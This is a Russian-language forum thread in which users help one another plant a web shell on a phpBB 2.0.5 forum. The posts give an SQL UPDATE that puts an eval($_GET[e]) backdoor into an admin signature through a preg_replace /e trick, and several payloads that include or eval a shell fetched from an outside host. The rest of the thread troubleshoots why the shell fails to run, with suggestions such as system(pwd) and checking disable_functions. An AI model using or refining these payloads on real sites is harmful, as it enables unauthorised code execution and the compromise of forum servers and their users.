Вечер добрый, не получается залить шелл в phpbb 2.0.5. Пытаюсь залить через восстановление БД: Code: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_GET[e]));' WHERE user_id=2; . И пхпинфо прекрасно отображается так: forum/profile.php?mode=editprofile&e=phpinfo(); А вот когда таким путем пытаюсь залить сам шелл: Code: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:include("http://site.ru/shell.php")' WHERE user_id=2; . Получаю лишь белую, пустую страницу Прошу Вашей помощи
Ах да, изначально косякнул в том, что залил шелл туда где пхп исполняется. Сейчас вроде нашел что-то адекватное, но не до конца уверен. Так что буду рад еще совету куда можно загрузить сам шелл, что в последствии уже без проблем загружать на нужный сайт.
Да, allow_url_fopen - on Попробовал через file_get_contents(); Такая конструкция Code: forum/profile.php?mode=editprofile&e=eval(file_get_contents(http://site/1.txt)); Возвращаюсь в профайл админа, и никаких результатов.
Надо вот так: forum/profile.php? mode=editprofile&e=file_get_contents(http://site/1.txt); а 1.txt должен быть шелом но без тегов: <?, <?php, ?>
Да, и так попробовал. Все верно, теги удалил. Результат тот же. Реагирует ровно также когда ошибаюсь с синтаксисом. Т.е. ровно ничего не происходит. Работает только команда phpinfo().
пиздец, если у тебя работает phpinfo() Будет работать всё, впиши system(pwd); а дальше отсюда и пляши
Вообщем в чем дело понять не могу. Перепробовал уже все, и copy и include, и кавычки с пробелами через ASCII убирал. В пхп не силен вообще, использовал команды которые найти смог по данной теме. В итоге результат один, никаких ошибок, просто отображается нормальный профиль админа без изменений. Срабатывает пхпинфо. И все. Что за.
Так а, это, вероятность отключенных функций проверялась? Мне самому такое еще не попадалось, но оно дб прописано в php.ini, "disable_functions".
